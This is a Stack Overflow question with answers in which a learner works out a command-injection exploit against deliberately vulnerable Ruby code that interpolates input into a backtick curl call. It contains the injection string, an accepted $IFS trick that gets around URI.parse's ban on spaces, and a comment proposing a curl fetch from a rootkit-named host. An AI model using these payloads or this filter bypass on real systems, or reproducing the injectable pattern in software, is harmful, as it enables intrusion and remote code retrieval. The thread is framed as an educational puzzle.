2

I've been learning about remote/arbitrary command execution. In doing so, I came across some Ruby I thought would be fun to try and exploit.

I've been somewhat successful as I managed to get it to run the 'ls' command, but I can't work out how to add space characters into my commands. If I add a space in, the parse method that URI calls throws an exception.

Here's the code I was trying to exploit:

injection = "www.google.com';ls;#"

require 'uri'
URI.parse(injection)
puts `curl '#{injection}'`

So your challenge, should you choose to accept it, is to run an 'ls -l' command instead of 'ls' by only changing the injection string. You may not change anything but the first line.

Things I've tried:

ls%2f-l   - # Doesn't raise an exception but unix doesn't unescape CGI encodings.
ls\x20-l  - # Raises an exception because Ruby parses the UTF-8.

# Other various escape combinations (\\x20, etc)

Maybe it's not possible?

Thanks

Chris
  • 1,501
  • 17
  • 32

2 Answers2

6

You can use the Internal Field Separator (<space><tab><newline>). Since this is what the shell separates with anyway, it will accept it as a separator.

injection = "www.google.com';ls$IFS-l;#"

(BTW, thanks for a nice Saturday night puzzle.)

Rob Napier
  • 286,113
  • 34
  • 456
  • 610
  • Any idea why this doesn't work with other commands such as echo and curl? e.g. curl$IFShttp://some.rootkit.com – Chris Sep 02 '12 at 10:34
  • See http://stackoverflow.com/questions/12235373/using-the-internal-field-separator-with-curl – Chris Sep 02 '12 at 10:57
0

Is - it's possible. Just put your string in quotes:

1) from a command prompt:

two strings # No quote: the shell sees two strings

"one string" # with single (') or double quotes (") the shell sees only one string

2) from a string literal

mystring = "\"this will be interpreted as one string\"";

paulsm4
  • 114,292
  • 17
  • 138
  • 190
  • I'm not really sure this is what I'm after. How could this be used to change the injection string to run an ls -l ? – Chris Sep 02 '12 at 00:43